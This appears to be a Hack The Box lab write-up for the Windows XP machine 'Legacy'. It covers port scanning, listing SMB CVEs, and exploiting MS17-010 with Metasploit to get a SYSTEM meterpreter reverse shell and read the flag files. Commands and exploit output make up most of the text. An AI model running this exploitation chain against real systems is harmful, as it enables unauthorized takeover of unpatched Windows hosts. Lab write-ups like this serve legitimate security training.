Machine IP | 10.10.10.4 |
System | Windows |
I start by modifying my /etc/hosts
file to avoid writing the IP everytime :
10.10.10.4 legacy
Then I look for open ports and start an openvas scan:
nmap -p- legacy -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 20:20 CEST
Nmap scan report for legacy (10.10.10.4)
Host is up (0.034s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Now I can start nmap scripts on the open ports to gather more information:
nmap -p139,445,3389 -A -Pn legacy
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 20:26 CEST
Nmap scan report for legacy (10.10.10.4)
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h24m49s, deviation: 2h07m16s, median: 4d22h54m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:5b:81 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-09-27T23:21:43+03:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.34 seconds
My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:
Windows XP (Windows 2000 LAN Manager)
Port | Service |
---|---|
139 | netbios-ssn |
445 | microsoft-ds |
3389 | ms-wbt-server |
CVE | Service | Description | Severity |
---|---|---|---|
CVE-2008-4114 | SMB | Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote | High |
CVE-2008-4834 | SMB | Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote | High |
CVE-2008-4835 | SMB | Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Remote | High |
CVE-2017-0143 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
CVE-2017-0144 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
CVE-2017-0145 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
CVE-2017-0146 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
CVE-2017-0147 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
CVE-2017-0148 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
I start Metasploit with msfconsole
and search for the CVE I have found.
msf5 > search 2008-4114
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/smb/ms09_001_write normal No Microsoft SRV.SYS WriteAndX Invalid DataOffset
I select the exploit found and configure it to target the IP 10.10.10.4
:
msf5 > use auxiliary/dos/windows/smb/ms09_001_write
msf5 auxiliary(dos/windows/smb/ms09_001_write) > show options
Module options (auxiliary/dos/windows/smb/ms09_001_write):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
msf5 auxiliary(dos/windows/smb/ms09_001_write) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(dos/windows/smb/ms09_001_write) >
Unfortunately the exploit does not work. From there I tried multiple other exploits listing each CVE discovered earlier. At some point one of them got me a meterpreter terminal:
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821eb010
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... GCweOYDs.exe
[*] 10.10.10.4:445 - Created \GCweOYDs.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \GCweOYDs.exe...
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.4:1031) at 2019-09-22 20:54:18 +0200
meterpreter >
Sweet, let's see if I am root already:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Even better, getting the user and root flags should be a formality from there:
meterpreter > cat "C:\Documents and Settings\john\Desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f
meterpreter > cat "C:\Documents and Settings\Administrator\Desktop\root.txt"
993442d258b0e0ec917cae9e695d5713